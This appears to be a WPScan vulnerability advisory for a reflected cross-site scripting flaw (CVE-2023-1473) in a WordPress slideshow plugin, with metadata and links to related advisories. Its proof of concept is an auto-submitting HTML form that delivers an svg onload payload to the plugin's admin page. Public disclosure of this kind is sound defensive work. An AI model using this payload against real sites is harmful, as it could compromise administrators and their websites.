Responsive WordPress Slideshows 3.29.0 – Reflected XSS | CVE 2023-1473 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=metaslider" method="POST">
        <input type="hidden" name="page" value='"><svg/onload=alert(/XSS/)>'/>
        <input type="submit" name="submit" value="Send" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 3.29.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

a6e6c67b-7d9b-4fdb-8115-c33add7bfc3d

Timeline

Publicly Published

2023-03-27 (about 1 years ago)

Added

2023-03-27 (about 1 years ago)

Last Updated

2023-03-27 (about 1 years ago)

Other

Published

Title

Published

2023-10-03

Title

Form Maker by 10Web < 1.15.19 - Unauthenticated Stored XSS

Published

2013-07-23

Title

Download Monitor < 3.3.6.2 - Multiple Reflected Cross-Site Scripting

Published

2021-09-20

Title

Html5 Audio Player < 2.1.3 - Contributor+ Stored Cross-Site Scripting

Published

2024-04-05

Title

FancyBox for WordPress 3.0.2 - 3.3.3 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2023-05-18

Title

Scripts n Styles < 3.5.8 - Admin+ Stored XSS